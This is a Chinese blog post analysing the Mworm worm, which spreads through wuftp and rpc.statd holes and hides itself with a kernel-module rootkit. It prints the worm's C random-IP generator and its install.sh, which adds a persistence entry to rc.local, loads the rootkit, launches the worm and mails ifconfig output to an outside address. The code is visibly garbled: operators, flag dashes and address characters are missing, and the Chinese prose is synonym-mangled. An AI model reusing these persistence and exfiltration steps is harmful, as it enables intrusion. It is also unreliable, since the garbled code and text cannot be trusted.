没有检索到摘要
基于Mscan的蠕虫构造剖析
Mworm是一个基于Mscan扫描器的蠕虫程序,重要是应用wuftp跟rpc.statd漏洞进行传布,同时也对Windows体系存在Unicode破绽的机器进行标识,将c:\winnt\system32\cmd.exe复制到c:\Mworm.exe。本蠕虫程序没有任何迫害性。
本蠕虫的扫描是基于Mscan进行的,主要是扫描80,21和111端口。一共包含如下程序和脚本:
Mworm: 蠕虫主程序,负责扫描和流传。
Md:一个 Server,负责远程从服务端下载蠕虫紧缩包。
3c95: 一个LKM,负责暗藏含有Mscan,Mworm和Md的文件和过程。
localsetup.sh: 将蠕虫在本地装置时候运行的脚本。
install.sh: 编译和运行蠕虫程序,用于远程。
start: 该文件中包含须要写入在/etc/rc.d/rc.local文件的内容。
Mworm.tgz中包括了所有的源程序言件,而不象一些蠕虫程序里面除了脚本其余都不源程序(:P。
Mworm的程序流程图如下所示:
多少个小局部程序:
发生随机IP地址,以供Mscan扫描。
char . create_randomIP() //create a ip address, the last bit is 1
{
int a0,b0,c0;
char . returnv(char.)malloc(sizeof(char).24);
srand(time(NULL));
start:;
a1+(int) (223.0.rand()/(RAND_MAX+1.0));
b1+(int) (255.0.rand()/(RAND_MAX+1.0));
c1+(int) (223.0.rand()/(RAND_MAX+1.0));
if (a 127) { goto start; }
if (a 0) { goto start; }
if (a 1) { goto start; }
if (a 2) { goto start; }
if (a 3) { goto start; }
if (a 4) { goto start; }
if (a 5) { goto start; }
if (a 6) { goto start; }
if (a 7) { goto start; }
if (a 8) { goto start; }
if (a 9) { goto start; }
if (a 10) { goto start; }
if (a 49) { goto start; }
if (a 192) { if (b 168) { goto start; } }
sprintf(returnv,"i.i.i.1", a, b,c);
return returnv;
}
install.sh,编译和运行Mworm
#!/bin/sh
cat startup >> /etc/rc.d/rc.local
gcc O3 DMODULE D__KERNEL__ c 3c95.c
/sbin/insmod 3c95.o
killall 9 Md
killall 9 Mworm
./Md
./Mworm &
/sbin/ifconfig a ' mail s Msanworm mscanwormyahoo..cn
阅读(175) | 评论(0) | 转发(0) |
0
上一篇:没有了
下一篇:没有了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
